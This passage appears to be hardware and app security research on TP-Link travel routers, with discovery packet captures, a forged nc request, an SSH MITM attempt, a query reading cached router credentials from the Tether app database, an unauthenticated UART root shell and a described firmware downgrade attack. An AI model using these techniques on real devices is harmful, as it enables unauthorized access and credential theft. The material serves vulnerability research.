WAN_PPP_CONN_PORTMAPPING, PPP_CONN_PORTTRIGGERING, WAN_PPP_CONN_STATS, STAT_CFG, STAT_ENTRY, DDOS_CFG, DOS_HOST, ARP, ARP_ENTRY, ARP_BIND, ARP_BIND_ENTRY, QUEUE_MANAGEMENT, CLASSIFICATION, QOS_APP, QOS_INTF, QOS_QUEUE, TC, TC_RULE, ALG_CFG, IPTV, DSL_IPTV_CFG, ETH_IPTV_CFG, FIREWALL, INTERNAL_HOST, EXTERNAL_HOST, TASK_SCHEDULE, RULE, URL_LIST, URL_CFG, IP6_FIREWALL, IP6_INTERNAL_HOST, IP6_EXTERNAL_HOST, IP6_TASK_SCHEDULE, IP6_RULE, IP6_TUNNEL, DSLITE, SIT_6RD, SERVICES, VOICE, XTP_VOICE_PROCESS_STS, XTP_VOICE_PROCESS, VOICE_CAP, VOICE_CAP_SIP, VOICE_CAP_MGCP, VOICE_CAP_CODECS, VOICE_PROF, VOICE_PROF_PROVIDER, VOICE_PROF_SIP, VOICE_PROF_SIP_EVTSUBSCRIBE, VOICE_PROF_MGCP, VOICE_PROF_RTP, VOICE_PROF_FAXT38, XTP_USB_VOICEMAIL_PUBLICCFG, XTP_MULTI_ISP, XTP_MULTIISP_CODEC, XTP_MULTIISP_CODEC_LIST, VOICE_PROF_LINE, VOICE_PROF_LINE_SIP, VOICE_PROF_LINE_XTPUSBVM, VOICE_PROF_LINE_CALLFEAT, VOICE_PROF_LINE_PROC, VOICE_PROF_LINE_CODEC, VOICE_PROF_LINE_CODEC_LIST, VOICE_PROF_LINE_STATS, XTP_FEATURE_CODE, VOICE_PHY_INTERFACE, VOICE_PHYINTERFACE_TESTS, XTP_VOICE_MULTI_ISPDIALPLAN, XTP_VOICE_PSTN, STORAGE_SERVICE, CAPABLE, USER_ACCOUNT, USB_DEVICE, LOGICAL_VOLUME, FOLDER_BROWSE, FOLDER_NODE, DLNA_MEDIA_SERVER, DLNA_MEDIA_SERVER_FOLDER, SMB_SERVICE, SMB_SERVICE_FOLDER, SMB_USER_ACCESS, FTP_SERVER, FTP_SERVER_FOLDER, FTP_USER_ACCESS, XTP_PRINT_SERVICE, XTP_IGD_CALL_FIREWALL_CFG, XTP_IGD_SPEED_DIAL_CFG, XTP_IGD_MULTI_ISP_DIAL_PLAN, XTP_IGD_MULTIISPDP_LIST, XTP_CALLLOGCFG, IPSEC, IPSEC_CFG, SYS_MODE, EWAN, USER_INFO, GPON_USER_INFO, GPON_AUTH_CTC, GPON_AUTH_SN, GPON_AUTH_PWD, GPON_MAC_INFO, GPON_FWD_RULE, GPON_LOCAL_RULE_ENTRY, GPON_REMOTE_RULE_ENTRY, GPON_OMCI_IOT, GPON_OMCI_IOT_ENTRY, GPON_OMCI_ME_ATTR, CLOUD_SERVICE, FW_UPGRADE_INFO, CLOUD_USER_ACCOUNT, OWNER_INFO, CURRENT_USER_INFO, CLOUD_DDNS, CLOUD_DDNS_ENTRY, WAN_BLOCK, WAN_ERROR_BLOCK, FW_UP_INFO_BLOCK, IPPING_DIAG, TRACEROUTE_DIAG, SDMZ_CFG, WEB_CFG, VLAN, ISP_SERVICE, WOL, WOL_ITEM, IPV6_CFG, SYS_STATE, IPV6_PASS_THROUGH, AUTO_REBOOT_CFG, CPU_MEM, PRODUCE_INFO, MULTIMODE, MULTIMODE_AP, AP_CONFIG_WEPKEY, AP_SNMP_CFG, MULTIMODE_CLIENT, MULTIMODE_RE, RE_CONFIG_WEPKEY, MULTIMODE_ROUTER, ROUTER_CONFIG_WEPKEY, ROUTER_CONFIG_MULTISSID, ROUTER_CONFIG_MSSIDENTRY, MULTIMODE_MSSID, MSSID_CONFIG_MULTISSID, MSSID_CONFIG_MSSIDENTRY, MULTIMODE_HOTSPOT, PING_WATCH_DOG, LED_CONTROL];
for(let i=0; i<oid_list.length; i++){
$.act(ACT_GL, oid_list[i]);
$.exe();
}
Mobile App
Tether
"TP-Link Tether provides the easiest way to access and manage your TP-Link Router/ xDSL Router/ Range Extender with your mobile devices. From quick setup to parental controls, Tether provides a simple, intuitive user interface to see your device status, online client devices and their privileges."
Note: The TP-Link tether app adopts SSH services and TCP port 22 is opened on supported TP-Link devices. However, these SSH Services are only available for TP-Link apps. Other SSH clients cannot access to TP-Link products or adjust their settings with command lines. Source: [Support]
| OS | Link |
|---|---|
| Android | https://play.google.com/store/apps/details?id=com.tplink.tether |
| IOS | https://itunes.apple.com/us/app/tp-link-tether/id599496594?ls=1&mt=8 |
Note: Requires in-depth investigation!
Device Discovery
Before establishing an SSH session, the Tether app sends an multicast discovery UDP packet to
255.255.255.255 on port 20002. This message gets send 4 times. After that, the Tether app send another unicast message to responding devices on port 20002. The syntax of the payload is mostly unclear, an change after a restart. Anyway a device will still respond to any payload captured at any time. I assume that this discovery process is used to get device capatibilities and to finally initialize a secure channel via SSH. How the SSH tunnel gets initiated is also unkown at this state of research. The Tether app uses Java Secure Channel client and the devices use a dropbear server for SSH connections.
ⓘ Multicast Discovery Request
Internet Protocol Version 4, Src: 192.168.1.102, Dst: 255.255.255.255
User Datagram Protocol, Src Port: 54909, Dst Port: 20002
Data: 0100000200001101000001d235406ce6 (16 bytes)
// 0000 ff ff ff ff ff ff 3c 22 fb 9b fb 7e 08 00 45 00 ......<"...~..E.
// 0010 00 2c 16 ae 40 00 40 11 62 05 c0 a8 01 66 ff ff .,..@.@.b....f..
// 0020 ff ff d6 7d 4e 22 00 18 63 14 01 00 00 02 00 00 ...}N"..c.......
// 0030 11 01 00 00 01 d2 35 40 6c e6 ......5@l.
ⓘ Multicast Discovery Response
Internet Protocol Version 4, Src: 192.168.1.1, Dst: 192.168.1.102
User Datagram Protocol, Src Port: 20002, Dst Port: 54909
Data: 0100000200b01201000001d2fdb65d9800010004c0a80101… (192 bytes)
// 0000 3c 22 fb 9b fb 7e 98 da c4 6e 00 fc 08 00 45 00 <"...~...n....E.
// 0010 00 dc 00 00 40 00 40 11 b6 59 c0 a8 01 01 c0 a8 ....@.@..Y......
// 0020 01 66 4e 22 d6 7d 00 c8 3e c8 01 00 00 02 00 b0 .fN".}..>.......
// 0030 12 01 00 00 01 d2 fd b6 5d 98 00 01 00 04 c0 a8 ........].......
// 0040 01 01 ff 00 00 00 00 06 00 04 ff ff ff 00 ff 00 ................
// 0050 00 00 00 02 00 11 39 38 3a 44 41 3a 43 34 3a 36 ......98:DA:C4:6
// 0060 45 3a 30 30 3a 46 43 ff 00 00 00 03 00 0c 54 50 E:00:FC.......TP
// 0070 2d 4c 69 6e 6b 5f 30 30 46 43 ff 00 00 00 00 04 -Link_00FC......
// 0080 00 04 00 0d c8 8f ff 00 00 00 00 05 00 0a 54 4c ..............TL
// 0090 2d 57 52 39 30 32 41 43 ff 00 00 08 00 04 00 00 -WR902AC........
// 00a0 00 01 ff 00 00 00 00 09 00 0e 57 69 72 65 6c 65 ..........Wirele
// 00b0 73 73 52 6f 75 74 65 72 ff 00 00 10 00 28 65 64 ssRouter.....(ed
// 00c0 63 38 37 66 37 39 37 32 37 31 39 66 66 33 36 64 c87f7972719ff36d
// 00d0 30 37 36 66 61 30 35 34 30 65 33 39 62 62 46 46 076fa0540e39bbFF
// 00e0 30 30 30 30 30 30 ff 00 00 00 000000....
ⓘ Unicast Discovery Request
Internet Protocol Version 4, Src: 192.168.1.102, Dst: 192.168.1.1
User Datagram Protocol, Src Port: 44794, Dst Port: 20002
Data: 0100000200001101000003e56b89a97b (16 bytes)
// 0000 98 da c4 6e 00 fc 3c 22 fb 9b fb 7e 08 00 45 00 ...n..<"...~..E.
// 0010 00 2c a6 c3 40 00 40 11 10 46 c0 a8 01 66 c0 a8 .,..@.@..F...f..
// 0020 01 01 ae fa 4e 22 00 18 53 fc 01 00 00 02 00 00 ....N"..S.......
// 0030 11 01 00 00 03 e5 6b 89 a9 7b ......k..{
ⓘ Unicast Discovery Response
Internet Protocol Version 4, Src: 192.168.1.1, Dst: 192.168.1.102
User Datagram Protocol, Src Port: 20002, Dst Port: 44794
Data: 0100000200b01201000003e56c37995b00010004c0a80101… (192 bytes)
// 0000 3c 22 fb 9b fb 7e 98 da c4 6e 00 fc 08 00 45 00 <"...~...n....E.
// 0010 00 dc 00 00 40 00 40 11 b6 59 c0 a8 01 01 c0 a8 ....@.@..Y......
// 0020 01 66 4e 22 ae fa 00 c8 b9 f4 01 00 00 02 00 b0 .fN"............
// 0030 12 01 00 00 03 e5 6c 37 99 5b 00 01 00 04 c0 a8 ......l7.[......
// 0040 01 01 ff 00 00 00 00 06 00 04 ff ff ff 00 ff 00 ................
// 0050 00 00 00 02 00 11 39 38 3a 44 41 3a 43 34 3a 36 ......98:DA:C4:6
// 0060 45 3a 30 30 3a 46 43 ff 00 00 00 03 00 0c 54 50 E:00:FC.......TP
// 0070 2d 4c 69 6e 6b 5f 30 30 46 43 ff 00 00 00 00 04 -Link_00FC......
// 0080 00 04 00 0d c8 8f ff 00 00 00 00 05 00 0a 54 4c ..............TL
// 0090 2d 57 52 39 30 32 41 43 ff 00 00 08 00 04 00 00 -WR902AC........
// 00a0 00 01 ff 00 00 00 00 09 00 0e 57 69 72 65 6c 65 ..........Wirele
// 00b0 73 73 52 6f 75 74 65 72 ff 00 00 10 00 28 65 64 ssRouter.....(ed
// 00c0 63 38 37 66 37 39 37 32 37 31 39 66 66 33 36 64 c87f7972719ff36d
// 00d0 30 37 36 66 61 30 35 34 30 65 33 39 62 62 46 46 076fa0540e39bbFF
// 00e0 30 30 30 30 30 30 ff 00 00 00 000000....
Forged Unicast Discovery Request plus Response Example
echo -e '\x01''\x00''\x00''\x02''\x00''\x00''\x11''\x01''\x00''\x00''\x02''\x89''\xfc''\x17''\xe0''\x92' | nc -u 192.168.1.1 20002 | hexdump -C
00000000 01 00 00 02 00 b0 12 01 00 00 02 89 d2 9d a4 13 |................|
00000010 00 01 00 04 c0 a8 01 01 ff 00 00 00 00 06 00 04 |................|
00000020 ff ff ff 00 ff 00 00 00 00 02 00 11 39 38 3a 44 |............98:D|
00000030 41 3a 43 34 3a 36 45 3a 30 30 3a 46 43 ff 00 00 |A:C4:6E:00:FC...|
00000040 00 03 00 0c 54 50 2d 4c 69 6e 6b 5f 30 30 46 43 |....TP-Link_00FC|
00000050 ff 00 00 00 00 04 00 04 00 0d c8 8f ff 00 00 00 |................|
00000060 00 05 00 0a 54 4c 2d 57 52 39 30 32 41 43 ff 00 |....TL-WR902AC..|
00000070 00 08 00 04 00 00 00 01 ff 00 00 00 00 09 00 0e |................|
00000080 57 69 72 65 6c 65 73 73 52 6f 75 74 65 72 ff 00 |WirelessRouter..|
00000090 00 10 00 28 65 64 63 38 37 66 37 39 37 32 37 31 |...(edc87f797271|
000000a0 39 66 66 33 36 64 30 37 36 66 61 30 35 34 30 65 |9ff36d076fa0540e|
000000b0 33 39 62 62 46 46 30 30 30 30 30 30 ff 00 00 00 |39bbFF000000....|
Point of interest: edc87f7972719ff36d076fa0540e39bb (32B) FF000000 (8B)
SSH Man-in-the-middle
Using ssh-mitm, it was possible to interfear the credential on connnection establishment between the mobile App and a device. However, the connection then breaks down because Tether notices that something is wrong. I suspect this has to do with an SSH tunnel or similar. Unfortunately I don't know how the Tether App exchanges data via SSH.
Reverse Engineering
ⓘ ./assets/tp-link-root-CA.pem
-----BEGIN CERTIFICATE----- MIIDBzCCAe+gAwIBAgIQT5x0ma7QnINHCQvhnmzR9zANBgkqhkiG9w0BAQsFADAV MRMwEQYDVQQDEwp0cC1saW5rLUNBMCAXDTE4MDExOTA4Mjc1MloYDzIwNjgwMTE5 MDgzNzUyWjAVMRMwEQYDVQQDEwp0cC1saW5rLUNBMIIBIjANBgkqhkiG9w0BAQEF AAOCAQ8AMIIBCgKCAQEAuGG8n5zEUN1j5wuvUz4pAIMurhKHbpfUUu+b2acFHKS6 iU9hNJWvDyhXcihY5Wz6aq9m4D5SZcgW3k31YoNNtrztDjdg2qw7AaX85S99/G0B VbIXktrhs34OW19WA/haDwut3dFhLem+gCRRKUXcmuqchZc84dY7JFVfhPcJci4m sRjLCFNO0ho9OX+MZwfO4BLaeAqKVoAor6rf4BXVtO0xjYHDKO0fb3AWLLJ4EjGe q6YieqPiYlPFEqRm5PrvBXTm0IuQogygyVpK4LHr/K207ZLyV33DxLLbsUgSEJVn pZUv/WUujXjlIDgxIvyZZCYiXO3dle2/MEvpmZk6JQIDAQABo1EwTzALBgNVHQ8E BAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUxu2iBRTsef5iNnsADVhM JDQWi6kwEAYJKwYBBAGCNxUBBAMCAQAwDQYJKoZIhvcNAQELBQADggEBAB52Majd +wo3cb5BsTo63z2Psbbyl4ACMUaw68NxUMy61Oihx3mcLzLJqiIZcKePiHskLqLJ F7QfT9TqjvizMjFJVgsLuVubUBXKBzqyN+3KKlQci0PO3mH+ObhyaE7BzV+qrS3P dVTgsCWFv8DkgLTRudSWxL7VwVoedc7lRz5EroGgJ33nRGCR0ngcW919tLTARDQO pULmzulcdWeZgG+0PLX0xjJQIjFEvbOxR1Z+gxMupBz0rWFokmWYrcga8eWiWzjQ Ia3/ASBVJ69srV77trWlfLumkChbXk9i64NXBKnce0Jmll0Y9OC1nMPqrbQKnzcn dSAA4fejD/qMQn0= -----END CERTIFICATE-----
ⓘ openssl x509 -in tp-link-root-CA.pem --text
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
4f:9c:74:99:ae:d0:9c:83:47:09:0b:e1:9e:6c:d1:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = tp-link-CA
Validity
Not Before: Jan 19 08:27:52 2018 GMT
Not After : Jan 19 08:37:52 2068 GMT
Subject: CN = tp-link-CA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:61:bc:9f:9c:c4:50:dd:63:e7:0b:af:53:3e:
29:00:83:2e:ae:12:87:6e:97:d4:52:ef:9b:d9:a7:
05:1c:a4:ba:89:4f:61:34:95:af:0f:28:57:72:28:
58:e5:6c:fa:6a:af:66:e0:3e:52:65:c8:16:de:4d:
f5:62:83:4d:b6:bc:ed:0e:37:60:da:ac:3b:01:a5:
fc:e5:2f:7d:fc:6d:01:55:b2:17:92:da:e1:b3:7e:
0e:5b:5f:56:03:f8:5a:0f:0b:ad:dd:d1:61:2d:e9:
be:80:24:51:29:45:dc:9a:ea:9c:85:97:3c:e1:d6:
3b:24:55:5f:84:f7:09:72:2e:26:b1:18:cb:08:53:
4e:d2:1a:3d:39:7f:8c:67:07:ce:e0:12:da:78:0a:
8a:56:80:28:af:aa:df:e0:15:d5:b4:ed:31:8d:81:
c3:28:ed:1f:6f:70:16:2c:b2:78:12:31:9e:ab:a6:
22:7a:a3:e2:62:53:c5:12:a4:66:e4:fa:ef:05:74:
e6:d0:8b:90:a2:0c:a0:c9:5a:4a:e0:b1:eb:fc:ad:
b4:ed:92:f2:57:7d:c3:c4:b2:db:b1:48:12:10:95:
67:a5:95:2f:fd:65:2e:8d:78:e5:20:38:31:22:fc:
99:64:26:22:5c:ed:dd:95:ed:bf:30:4b:e9:99:99:
3a:25
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage:
Digital Signature, Certificate Sign, CRL Sign
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
C6:ED:A2:05:14:EC:79:FE:62:36:7B:00:0D:58:4C:24:34:16:8B:A9
1.3.6.1.4.1.311.21.1:
...
Signature Algorithm: sha256WithRSAEncryption
1e:76:31:a8:dd:fb:0a:37:71:be:41:b1:3a:3a:df:3d:8f:b1:
b6:f2:97:80:02:31:46:b0:eb:c3:71:50:cc:ba:d4:e8:a1:c7:
79:9c:2f:32:c9:aa:22:19:70:a7:8f:88:7b:24:2e:a2:c9:17:
b4:1f:4f:d4:ea:8e:f8:b3:32:31:49:56:0b:0b:b9:5b:9b:50:
15:ca:07:3a:b2:37:ed:ca:2a:54:1c:8b:43:ce:de:61:fe:39:
b8:72:68:4e:c1:cd:5f:aa:ad:2d:cf:75:54:e0:b0:25:85:bf:
c0:e4:80:b4:d1:b9:d4:96:c4:be:d5:c1:5a:1e:75:ce:e5:47:
3e:44:ae:81:a0:27:7d:e7:44:60:91:d2:78:1c:5b:dd:7d:b4:
b4:c0:44:34:0e:a5:42:e6:ce:e9:5c:75:67:99:80:6f:b4:3c:
b5:f4:c6:32:50:22:31:44:bd:b3:b1:47:56:7e:83:13:2e:a4:
1c:f4:ad:61:68:92:65:98:ad:c8:1a:f1:e5:a2:5b:38:d0:21:
ad:ff:01:20:55:27:af:6c:ad:5e:fb:b6:b5:a5:7c:bb:a6:90:
28:5b:5e:4f:62:eb:83:57:04:a9:dc:7b:42:66:96:5d:18:f4:
e0:b5:9c:c3:ea:ad:b4:0a:9f:37:27:75:20:00:e1:f7:a3:0f:
fa:8c:42:7d
-----BEGIN CERTIFICATE-----
MIIDBzCCAe+gAwIBAgIQT5x0ma7QnINHCQvhnmzR9zANBgkqhkiG9w0BAQsFADAV
MRMwEQYDVQQDEwp0cC1saW5rLUNBMCAXDTE4MDExOTA4Mjc1MloYDzIwNjgwMTE5
MDgzNzUyWjAVMRMwEQYDVQQDEwp0cC1saW5rLUNBMIIBIjANBgkqhkiG9w0BAQEF
AAOCAQ8AMIIBCgKCAQEAuGG8n5zEUN1j5wuvUz4pAIMurhKHbpfUUu+b2acFHKS6
iU9hNJWvDyhXcihY5Wz6aq9m4D5SZcgW3k31YoNNtrztDjdg2qw7AaX85S99/G0B
VbIXktrhs34OW19WA/haDwut3dFhLem+gCRRKUXcmuqchZc84dY7JFVfhPcJci4m
sRjLCFNO0ho9OX+MZwfO4BLaeAqKVoAor6rf4BXVtO0xjYHDKO0fb3AWLLJ4EjGe
q6YieqPiYlPFEqRm5PrvBXTm0IuQogygyVpK4LHr/K207ZLyV33DxLLbsUgSEJVn
pZUv/WUujXjlIDgxIvyZZCYiXO3dle2/MEvpmZk6JQIDAQABo1EwTzALBgNVHQ8E
BAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUxu2iBRTsef5iNnsADVhM
JDQWi6kwEAYJKwYBBAGCNxUBBAMCAQAwDQYJKoZIhvcNAQELBQADggEBAB52Majd
+wo3cb5BsTo63z2Psbbyl4ACMUaw68NxUMy61Oihx3mcLzLJqiIZcKePiHskLqLJ
F7QfT9TqjvizMjFJVgsLuVubUBXKBzqyN+3KKlQci0PO3mH+ObhyaE7BzV+qrS3P
dVTgsCWFv8DkgLTRudSWxL7VwVoedc7lRz5EroGgJ33nRGCR0ngcW919tLTARDQO
pULmzulcdWeZgG+0PLX0xjJQIjFEvbOxR1Z+gxMupBz0rWFokmWYrcga8eWiWzjQ
Ia3/ASBVJ69srV77trWlfLumkChbXk9i64NXBKnce0Jmll0Y9OC1nMPqrbQKnzcn
dSAA4fejD/qMQn0=
-----END CERTIFICATE-----
ⓘ ./assets/rsa/app_public_key.pem
-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAviMEj2Kss5OZzWS1Qyfz ErRbg9wjDRvLem1enx/cr8CvSETdMtEctRSQdwvdpOWVFEhGQXeNSbs5me55u8ZI eE3ph2JOW5PU++PsnvUIqqf8AJB1h+j0DcE+7tlsLRquskpNK9p6L/ziB8s/MaeA r//Nkhvdo32ax16UyzpeaOuReaLspDEHPN6+C7q6GFRZ8v0ILkQAFfGAEy94DI6Q CeXwBA90zLDDwKnyFwfp6r1Yi/1pUWzyXQLKmxzZJoiYO/J16fvyR4ILqzt40fyY cPsg+hpZUeGotBEt3AqTToeWPHbHKPCTgjMmYYGI0eqwbnMKKYMdZ34fViEDHhUy ewIDAQAB -----END PUBLIC KEY-----
Android Cache
The Tether app caches username, password and other information from configured devices. These information are encrypted using an AES/CBC/PKCS7Padding (256bit) cipher.
ⓘ TP_TETHER_CACHE.DB: Model
DEVICE (DEVICE_ID, MAC, USER_NAME, PASSWORD, NICK_NAME, NAME, FW_VERSION);
RE_EXTENDED_NETWORK (SSID, PASSWORD);
FUNCTION_POSITION (DEVICE_MODEL, FUNCTION_KEY, PAGE, POSITION);
BSSID_RECORD (BSSID, MODEL, HW_VERSION, FW_VERSION);
RE_DISTANCE_IGNORE (DEVICE_ID, IGNORE,IGNORE_BIND);
DEVICE_STATISTICS (ID, TPLINK_ID, HOST_NAME, MAC);
DEVICE_RATE (MAC, TIME, HAVETRIGGER, MODELNAME, HARDWAREVERSION, FIRMWAREVERSION, APPRATEDTRACKER);
DEVICE_RECORD (DEVICE_ID, INTO_PARENTAL_CONTROL_TIMES, ONEMESH_VER_TRACKED, SYSTEM_INFO_TRACKED, OPERATION_MODE_TRACKED, OPERATION_MODE_CHANGE_TRACKED);
CLIENTS_RECORD (ID, MAC, DEVICE_ID, CLIENT_TRACKED, ONEMESH_AVAILABLE_DEVICE_TRACKED, ONEMESH_ADDED_DEVICE_TRACKED);
DEVICE_RECORE_VERSION (DEVICE_ID, HOMECARE_VERSION_TRACKED);
RE_DISTANCE_IGNORE_V2 (DEVICE_ID, NEAR_IGNORE, FAR_IGNORE, HAS_POST);
ⓘ TP_TETHER_CACHE.DB: Access
$ cd /data/data/com.tplink.tether/databases
$ sqllite3 TP_TETHER_CACHE.DB
> .tables
> SELECT USER_NAME, PASSWORD FROM DEVICE;
# USER_NAME: CCB759C153B0AFFE39B6F7218238413B
# PASSWORD: CCB759C153B0AFFE39B6F7218238413B
Cipher: AES/CBC/PKCS7Padding (256bit)
Physical Intervention
Dissembling the TL-WR902AC has to be proven to be quite hard without damaging the case, and would have be even harder without the internal photos provided to the FCC, which revealed at least the position of the two clips holding the enclosure together. Additionally the top an bottom part of the case where lightly molded together. This requires the usage of some force when opening. The TL-WR802N is not molded together but hast 3 clips instead.
ⓘ TL-WR902AC: Printed Circuit Board
PCB Back
PCB Front
Bottom Case
Top Case
Case
ⓘ TL-WR802N: Printed Circuit Board
PCB Back
PCB Front
PCB in Case
On-Chip Debug
UART
Having a UART connection isn't necessary at any point of time, but it provides great insights on how the device operates and reacts to incomming requests. And to examine the devices' runtime configuration. The UART can be easily identified by just looking at the PCB. Follow the steps in our documentations Firmware Acquisition Techniques or JTAGulator: Find IoT-Device's UART interface for further information and guidance. Both investigated devices share the same UART configuration of 115200 (8N1) (screen /dev/$S_INT 115200,cs8). But the bootloader uses 115200 (7N1). (screen /dev/$S_INT 115200,cs7).
Note: Both devices provide a root shell without any need of authentification.
ⓘ UART Pin Assignment
TL-WR902AC V3
TL-WR802N V4
Bootloader
The examined devices both use the Universal Bootloader (U-Boot), but don't provide the means to access the U-Boot command line by my knowledge. Additionally it is require to configure the serial connection to use 115200 (8N1). The only functionality that the bootloader is able to provide is to start into recovery mode. This recovery mode allows to load an image called tp_recovery.bin over FTP. To do this one need to setup a FTP server with IP address 192.168.0.66 and connect the server to the device to recover via ethernet cable. If one has physical access to the device, one could start a downgrade attack, deploying that Firmware version 170828 which gives an attacker full control over the device without even the need to build a custom malicious image. The recovery mode can be started by pressing and holding the reset button until starting recovery... gets displayed. This process takes about 10 seconds to start. The device will automatically continue to boot normally if no FTP server or image is found.
ⓘ TL-WR902AC: Factory Reset Button behavior
// Factory Reset resetCount ++ 0. resetCount ++ 1. resetCount ++ 2. resetCount ++ 3. resetCount ++ 4. resetCount ++ 5. resetCount ++ 6. resetCount ++ 7. resetCount ++ 8. resetCount ++ 9. resetCount ++ 10. resetCount ++ 11. resetCount ++ 12. resetCount ++ 13. resetCount ++ 14. Factory configuration restored.. spiflash_ioctl_read, Read from 0x007c0000 length 0x10000, ret 0, retlen 0x10000 spiflash_ioctl_write, Write to 0x007c0000 length 0x10000, ret 0, retlen 0x10000 ... Soft Reset ...
ⓘ TL-WR902AC: Load recovery or custom image over FTP
U-Boot 1.1.3 (Aug 22 2017 - 09:54:30) Board: Ralink APSoC DRAM: 64 MB relocate_code Pointer at: 83fb4000 ****************************** Software System Reset Occurred <------------------------------------------ ****************************** gpiomode1 55154444. gpiomode2 05540555. flash manufacture id: c8, device id 40 17 find flash: GD25Q64B ============================================ Ralink UBoot Version: 4.3.0.0 -------------------------------------------- ASIC 7628_MP (Port5<->None) DRAM component: 512 Mbits DDR, width 16 DRAM bus: 16 bit Total memory: 64 MBytes Flash component: SPI Flash Date:Aug 22 2017 Time:09:54:30 ============================================ icache: sets:512, ways:4, linesz:32 ,total:65536 dcache: sets:256, ways:4, linesz:32 ,total:32768 ##### The CPU freq = 580 MHZ #### estimate memory size =64 Mbytes RESET MT7628 PHY!!!!!!.................................................. <---------- Contine holding reset button starting recovery... TODO, Read MAC Address from Flash netboot_common, argc= 3 NetTxPacket = 0x83FE38C0 KSEG1ADDR(NetTxPacket) = 0xA3FE38C0 NetLoop,call eth_halt ! NetLoop,call eth_init ! Trying Eth0 (10/100-M) Waitting for RX_DMA_BUSY status Start... done ETH_STATE_ACTIVE!! TFTP from server 192.168.0.66; our IP address is 192.168.0.2 Filename 'tp_recovery.bin'. TIMEOUT_COUNT=10,Load address: 0x80060000 Loading: T T T T T T T T T T <----------- Timemout Retry count exceeded; starting again ... Loads Linux ...
Bootlog
ⓘ TL-WR902AC: AC750 Wifi - Travel Router
Linux version 2.6.36 (soho@soho) (gcc version 4.6.3 (Buildroot 2012.11.1) ) #7 Mon Aug 28 15:55:59 HKT 2017
The CPU feqenuce set to 575 MHz
MIPS CPU sleep mode enabled.
CPU revision is: 00019655 (MIPS 24Kc)
Software DMA cache coherency
Determined physical RAM map:
memory: 04000000 @ 00000000 (usable)
Initrd not found or empty - disabling initrd
Zone PFN ranges:
Normal 0x00000000 -> 0x00004000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
0: 0x00000000 -> 0x00004000
Built 1 zonelists in Zone order, mobility grouping on. Total pages: 16256
Kernel command line: console=ttyS1,115200 root=/dev/mtdblock2 rootfstype=squashfs init=/sbin/init
PID hash table entries: 256 (order: -2, 1024 bytes)
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Primary instruction cache 64kB, VIPT, , 4-waylinesize 32 bytes.
Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
Writing ErrCtl register=0006b4ae
Readback ErrCtl register=0006b4ae
Memory: 61076k/65536k available (2715k kernel code, 4460k reserved, 664k data, 168k init, 0k highmem)
NR_IRQS:128
console [ttyS1] enabled
Calibrating delay loop... 386.04 BogoMIPS (lpj=772096)
pid_max: default: 4096 minimum: 301
Mount-cache hash table entries: 512
NET: Registered protocol family 16
RALINK_GPIOMODE = 55154444
RALINK_GPIOMODE = 55144444
***** Xtal 40MHz *****
start PCIe register access
RALINK_RSTCTRL = 2400000
RALINK_CLKCFG1 = fdbfffc0
*************** MT7628 PCIe RC mode *************
PCIE0 enabled
Port 0 N_FTS = 1b105000
init_rt2880pci done
bio: create slab <bio-0> at 0
pci 0000:00:00.0: BAR 0: can't assign mem (size 0x80000000)
pci 0000:00:00.0: BAR 8: assigned [mem 0x20000000-0x201fffff]
pci 0000:00:00.0: BAR 1: assigned [mem 0x20200000-0x2020ffff]
pci 0000:00:00.0: BAR 1: set to [mem 0x20200000-0x2020ffff] (PCI address [0x20200000-0x2020ffff]
pci 0000:01:00.0: BAR 0: assigned [mem 0x20000000-0x200fffff]
pci 0000:01:00.0: BAR 0: set to [mem 0x20000000-0x200fffff] (PCI address [0x20000000-0x200fffff]
pci 0000:01:00.1: BAR 0: assigned [mem 0x20100000-0x201fffff]
pci 0000:01:00.1: BAR 0: set to [mem 0x20100000-0x201fffff] (PCI address [0x20100000-0x201fffff]
pci 0000:00:00.0: PCI bridge to [bus 01-01]
pci 0000:00:00.0: bridge window [io disabled]
pci 0000:00:00.0: bridge window [mem 0x20000000-0x201fffff]
pci 0000:00:00.0: bridge window [mem pref disabled]
BAR0 at slot 0 = 0
bus=0x0, slot = 0x0
res[0]->start = 0
res[0]->end = 0
res[1]->start = 20200000
res[1]->end = 2020ffff
res[2]->start = 0
res[2]->end = 0
res[3]->start = 0
res[3]->end = 0
res[4]->start = 0
res[4]->end = 0
res[5]->start = 0
res[5]->end = 0
bus=0x1, slot = 0x0
res[0]->start = 20000000
res[0]->end = 200fffff
res[1]->start = 0
res[1]->end = 0
res[2]->start = 0
res[2]->end = 0
res[3]->start = 0
res[3]->end = 0
res[4]->start = 0
res[4]->end = 0
res[5]->start = 0
res[5]->end = 0
bus=0x1, slot = 0x0
res[0]->start = 20100000
res[0]->end = 201fffff
res[1]->start = 0
res[1]->end = 0
res[2]->start = 0
res[2]->end = 0
res[3]->start = 0
res[3]->end = 0
res[4]->start = 0
res[4]->end = 0
res[5]->start = 0
res[5]->end = 0
Switching to clocksource Ralink Systick timer
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
RT3xxx EHCI/OHCI init.
squashfs: version 4.0 (2009/01/31) Phillip Lougher
fuse init (API version 7.15)
msgmni has been set to 119
io scheduler noop registered
io scheduler deadline registered (default)
gpiomode1 55144444.
gpiomode2 00000445.
Ralink gpio driver initialized
Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
serial8250: ttyS0 at MMIO 0x10000d00 (irq = 21) is a 16550A
serial8250: ttyS1 at MMIO 0x10000c00 (irq = 20) is a 16550A
brd: module loaded
flash manufacture id: c8, device id 40 17
GD25Q64B(c8 40170000) (8192 Kbytes)
